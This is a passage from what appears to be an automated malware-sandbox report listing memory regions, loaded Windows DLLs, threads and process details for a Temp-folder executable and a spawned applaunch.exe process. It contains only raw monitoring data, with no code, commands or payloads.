"c:\\windows\\system32\\imm32.dll") Region: id = 3422 start_va = 0x7ffda8cc0000 end_va = 0x7ffda8d80fff monitored = 0 entry_point = 0x7ffda8ce0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3423 start_va = 0x7ffda6100000 end_va = 0x7ffda6285fff monitored = 0 entry_point = 0x7ffda614d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3424 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3425 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3426 start_va = 0x810000 end_va = 0x997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 3427 start_va = 0x9a0000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 3428 start_va = 0xb30000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 3429 start_va = 0x1f30000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 3430 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3431 start_va = 0x7ffda9870000 end_va = 0x7ffdaadcefff monitored = 0 entry_point = 0x7ffda99d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3432 start_va = 0x7ffda8100000 end_va = 0x7ffda8142fff monitored = 0 entry_point = 0x7ffda8114b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3433 start_va = 0x7ffda8320000 end_va = 0x7ffda8963fff monitored = 0 entry_point = 0x7ffda84e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3434 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3435 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3436 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3437 start_va = 0x7ffda8260000 end_va = 0x7ffda8314fff monitored = 0 entry_point = 0x7ffda82a22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3438 start_va = 0x7ffda7bb0000 end_va = 0x7ffda7bfafff monitored = 0 entry_point = 0x7ffda7bb35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3439 start_va = 0x7ffda7c10000 end_va = 0x7ffda7c23fff monitored = 0 entry_point = 0x7ffda7c152e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3440 start_va = 0x7ffda6530000 end_va = 0x7ffda65c5fff monitored = 0 entry_point = 0x7ffda6555570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3441 start_va = 0x640000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3443 start_va = 0x2080000 end_va = 0x23b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3444 start_va = 0x23c0000 end_va = 0x25d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 3445 start_va = 0x25e0000 end_va = 0x27fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 3446 start_va = 0x1f30000 end_va = 0x2041fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 3447 start_va = 0x2070000 end_va = 0x207ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 3448 start_va = 0x2800000 end_va = 0x2a14fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 3449 start_va = 0x2a20000 end_va = 0x2b33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 3450 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 3451 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 3452 start_va = 0x7ffdab2a0000 end_va = 0x7ffdab3f9fff monitored = 0 entry_point = 0x7ffdab2e38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3453 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3454 start_va = 0x2b40000 end_va = 0x2bfbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b40000" filename = "" Region: id = 3455 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3456 start_va = 0x7ffda5430000 end_va = 0x7ffda5451fff monitored = 0 entry_point = 0x7ffda5431a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3457 start_va = 0x7ffda62f0000 end_va = 0x7ffda6302fff monitored = 0 entry_point = 0x7ffda62f2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3458 start_va = 0x7ffda79c0000 end_va = 0x7ffda7a15fff monitored = 0 entry_point = 0x7ffda79d0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3459 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3460 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3461 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3462 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3463 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3464 start_va = 0x680000 end_va = 0x684fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3465 start_va = 0x690000 end_va = 0x690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 3466 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 3467 start_va = 0x2c00000 end_va = 0x2df5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c00000" filename = "" Region: id = 3468 start_va = 0x7ffd9c660000 end_va = 0x7ffd9c8d3fff monitored = 0 entry_point = 0x7ffd9c6d0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 3469 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3470 start_va = 0x6d0000 end_va = 0x6d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 3472 start_va = 0x2e00000 end_va = 0x2edcfff monitored = 0 entry_point = 0x2e5e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3473 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 3474 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 3475 start_va = 0x2f00000 end_va = 0x30fefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002f00000" filename = "" Thread: id = 132 os_tid = 0x8c8 Thread: id = 133 os_tid = 0xbe8 Thread: id = 134 os_tid = 0xe38 Thread: id = 135 os_tid = 0xcf0 Process: id = "8" image_name = "filename.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\filename.exe" page_root = "0xae36000" os_pid = "0x136c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x9c8" cmd_line = "\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3523 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3524 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3525 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3526 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3527 start_va = 0x600000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3528 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3529 start_va = 0x140000000 end_va = 0x1404abfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "filename.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\filename.exe") Region: id = 3530 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 3531 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3533 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3534 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 3535 start_va = 0x70000 end_va = 0x71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 3536 start_va = 0xb10000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 3537 start_va = 0x7ffd9e500000 end_va = 0x7ffd9e567fff monitored = 1 entry_point = 0x7ffd9e504970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 3538 start_va = 0x7ffda7d40000 end_va = 0x7ffda7f27fff monitored = 0 entry_point = 0x7ffda7d6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3539 start_va = 0x7ffda8a30000 end_va = 0x7ffda8adcfff monitored = 0 entry_point = 0x7ffda8a481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3540 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3541 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 3542 start_va = 0x80000 end_va = 0x13dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3543 start_va = 0xc10000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 3544 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3545 start_va = 0x7ffda5930000 end_va = 0x7ffda59a8fff monitored = 0 entry_point = 0x7ffda594fb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3562 start_va = 0x7ff5ffe50000 end_va = 0x7ff5ffecdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\apppatch64\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\apppatch64\\sysmain.sdb") Region: id = 3563 start_va = 0x7ffdaaee0000 end_va = 0x7ffdaaf86fff monitored = 0 entry_point = 0x7ffdaaef58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3564 start_va = 0x7ffdaae30000 end_va = 0x7ffdaaeccfff monitored = 0 entry_point = 0x7ffdaae378a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3565 start_va = 0xe00000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 3566 start_va = 0x7ffdab030000 end_va = 0x7ffdab08afff monitored = 0 entry_point = 0x7ffdab0438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3567 start_va = 0x140000 end_va = 0x146fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3576 start_va = 0x7ffda8ba0000 end_va = 0x7ffda8cbbfff monitored = 0 entry_point = 0x7ffda8be02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3577 start_va = 0x150000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3578 start_va = 0x150000 end_va = 0x156fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3579 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3580 start_va = 0x7ffd9e2e0000 end_va = 0x7ffd9e377fff monitored = 1 entry_point = 0x7ffd9e2e1000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 3603 start_va = 0x7ffdaadd0000 end_va = 0x7ffdaae21fff monitored = 0 entry_point = 0x7ffdaaddf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3604 start_va = 0x7ffda9000000 end_va = 0x7ffda927cfff monitored = 0 entry_point = 0x7ffda90d4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3605 start_va = 0x7ffda7cd0000 end_va = 0x7ffda7d39fff monitored = 0 entry_point = 0x7ffda7d06d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3606 start_va = 0x7ffdab400000 end_va = 0x7ffdab585fff monitored = 0 entry_point = 0x7ffdab44ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3607 start_va = 0x7ffda8ea0000 end_va = 0x7ffda8ff5fff monitored = 0 entry_point = 0x7ffda8eaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3608 start_va = 0x160000 end_va = 0x198fff monitored = 0 entry_point = 0x1612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3609 start_va = 0xc10000 end_va = 0xd97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 3610 start_va = 0xdf0000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 3611 start_va = 0x7ffda89f0000 end_va = 0x7ffda8a2afff monitored = 0 entry_point = 0x7ffda89f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3612 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3613 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 3614 start_va = 0x1200000 end_va = 0x1380fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 3615 start_va = 0x1390000 end_va = 0x278ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001390000" filename = "" Region: id = 3617 start_va = 0x2790000 end_va = 0x2c37fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "filename.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\filename.exe") Region: id = 3626 start_va = 0x7ffda7c00000 end_va = 0x7ffda7c0efff monitored = 0 entry_point = 0x7ffda7c03210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3627 start_va = 0x7ffd9b2a0000 end_va = 0x7ffd9b2a9fff monitored = 0 entry_point = 0x7ffd9b2a1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3636 start_va = 0x7ffd8a650000 end_va = 0x7ffd8afddfff monitored = 1 entry_point = 0x7ffd8a77d9f0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll") Region: id = 3637 start_va = 0x7ffd9d920000 end_va = 0x7ffd9da16fff monitored = 0 entry_point = 0x7ffd9d944d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 3655 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 3656 start_va = 0x190000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 3657 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3658 start_va = 0x7ffd2aef0000 end_va = 0x7ffd2aefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd2aef0000" filename = "" Region: id = 3664 start_va = 0x7ffd2af00000 end_va = 0x7ffd2af0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd2af00000" filename = "" Region: id = 3665 start_va = 0x7ffd2af10000 end_va = 0x7ffd2af9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd2af10000" filename = "" Region: id = 3666 start_va = 0x7ffd2afa0000 end_va = 0x7ffd2b00ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd2afa0000" filename = "" Region: id = 3667 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3668 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 3669 start_va = 0x2790000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 3670 start_va = 0x2790000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 3671 start_va = 0x2980000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 3672 start_va = 0x2990000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 3673 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3674 start_va = 0x2d90000 end_va = 0x1ad8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 3675 start_va = 0x1ad90000 end_va = 0x1b0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ad90000" filename = "" Region: id = 3676 start_va = 0xa00000 end_va = 0xb0cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 3677 start_va = 0x1b100000 end_va = 0x1b4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b100000" filename = "" Region: id = 3680 start_va = 0x1b500000 end_va = 0x1b836fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3712 start_va = 0x7ffd89180000 end_va = 0x7ffd8a645fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\e24742a3939bece9db8105d99720b0e0\\mscorlib.ni.dll") Thread: id = 138 os_tid = 0x8b8 Thread: id = 140 os_tid = 0xe88 Thread: id = 144 os_tid = 0x390 Thread: id = 145 os_tid = 0xadc Process: id = "9" image_name = "applaunch.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe" page_root = "0xafe8000" os_pid = "0x3b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xf94" cmd_line = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3546 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3547 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3548 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3549 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3550 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3551 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3552 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3553 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3554 start_va = 0x350000 end_va = 0x367fff monitored = 0 entry_point = 0x35eb7c region_type = mapped_file name = "applaunch.exe" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe") Region: id = 3555 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3556 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3557 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3558 start_va = 0xfffb0000 end_va = 0xfffd2fff monitored = 